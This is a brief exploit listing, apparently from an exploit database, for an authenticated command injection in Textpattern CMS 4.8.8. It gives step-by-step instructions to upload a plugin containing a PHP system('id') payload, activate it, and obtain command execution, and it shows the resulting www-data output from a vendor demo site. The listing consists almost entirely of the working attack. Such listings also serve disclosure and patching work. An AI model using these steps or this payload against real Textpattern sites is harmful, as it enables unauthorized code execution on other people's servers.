Share
## https://sploitus.com/exploit?id=PACKETSTORM:172967
# Exploit Title: Textpattern CMS v4.8.8 - Command Injection (Authenticated)  
# Date: 2023-06-15  
# Exploit Author: tmrswrr  
# Vendor Homepage: https://textpattern.com/  
# Software Link: https://textpattern.com/file_download/118/textpattern-4.8.8.zip  
# Version: v4.8.8  
# Tested : https://release-demo.textpattern.co/  
  
  
--- Description ---  
  
Textpattern CMS Upload Plugin Command Injection:  
1) Login admin page , choose Plugin , Choose command.php file inside this payload: :   
system('id');  
2) Save it and do Active plugin yes and click Update from disk  
3) After open page you will see result:   
https://release-demo.textpattern.co/  
uid=33(www-data) gid=33(www-data) groups=33(www-data)